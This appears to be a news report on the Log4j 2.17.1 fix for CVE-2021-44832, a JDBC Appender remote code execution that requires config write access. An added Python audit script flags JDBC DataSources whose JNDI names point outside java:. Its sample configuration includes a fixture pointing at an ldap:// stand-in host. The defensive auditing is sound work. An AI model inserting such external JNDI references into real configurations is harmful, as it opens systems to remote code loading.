Log4j 2.17.1 update fixing another vulnerability

Corrective releases of the Log4j library, 2.17.1, 2.3.2-rc1 and 2.12.4-rc1, have been published, fixing another vulnerability (CVE-2021-44832). It is mentioned that the issue allows remote code execution (RCE), but it is flagged as low-risk (CVSS score 6.6) and is mainly of theoretical interest, since exploitation requires specific conditions: the attacker must be able to make changes to the Log4j settings file, i.e. must have access to the attacked system and the authority to change the value of the log4j2.configurationFile configuration parameter or to make changes to existing files with logging settings.

The attack boils down to defining, on the local system, a JDBC Appender-based configuration that references an external JNDI URI, a request to which can return a Java class to be executed. By default, the JDBC Appender is not configured to handle protocols other than Java, i.e. without a configuration change the attack is not possible. In addition, the issue affects only the log4j-core JAR and does not affect applications that use the log4j-api JAR without log4j-core. ...
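Since the precondition described above is a modified Log4j configuration rather than a network-reachable input, a practical defensive check is to audit log4j2.xml files for JDBC appenders whose DataSource points at anything other than an in-process java: JNDI name. The following script is an added example, not code from the Log4j project or the article; it assumes the XML configuration format with the canonical JDBC and DataSource element names, and the sample configuration embedded in it is constructed for illustration.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple
from urllib.parse import urlsplit

# Constructed sample log4j2.xml: one JDBC appender wired to an in-process
# java: JNDI DataSource (the normal case) and one whose DataSource jndiName
# points at an external, non-java: URI (the pattern CVE-2021-44832 requires).
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
  <Appenders>
    <JDBC name="dbAppender" tableName="application_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="eventDate" isEventTimestamp="true"/>
    </JDBC>
    <JDBC name="suspectAppender" tableName="application_log">
      <DataSource jndiName="ldap://untrusted-host.example:1389/o=reference"/>
    </JDBC>
    <Console name="stdout" target="SYSTEM_OUT"/>
  </Appenders>
</Configuration>
"""


def find_external_jdbc_datasources(config_xml: str) -> List[Tuple[str, str]]:
    """Return (appender name, jndiName) for every JDBC appender whose
    DataSource jndiName is not an in-process java: reference.

    Log4j 2.17.1 limits the JDBC appender's JNDI lookup to the java:
    protocol, so any other scheme (ldap, ldaps, rmi, ...) in a config is
    exactly the change an attacker with write access would need, and is
    worth flagging in an audit of logging configuration files.
    """
    root = ET.fromstring(config_xml)
    findings = []
    for jdbc in root.iter("JDBC"):            # assumes canonical element names
        for ds in jdbc.iter("DataSource"):
            jndi = ds.get("jndiName", "")
            scheme = urlsplit(jndi).scheme.lower()
            if scheme != "java":              # empty or non-java: scheme
                findings.append((jdbc.get("name", "<unnamed>"), jndi))
    return findings


if __name__ == "__main__":
    for appender, jndi in find_external_jdbc_datasources(SAMPLE_CONFIG):
        print(f"JDBC appender '{appender}' uses external JNDI name: {jndi}")
```

Run it against every file that log4j2.configurationFile can point to, not just the default log4j2.xml on the classpath; JSON, YAML and properties configurations would need a separate parser.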

Source: opennet.ru
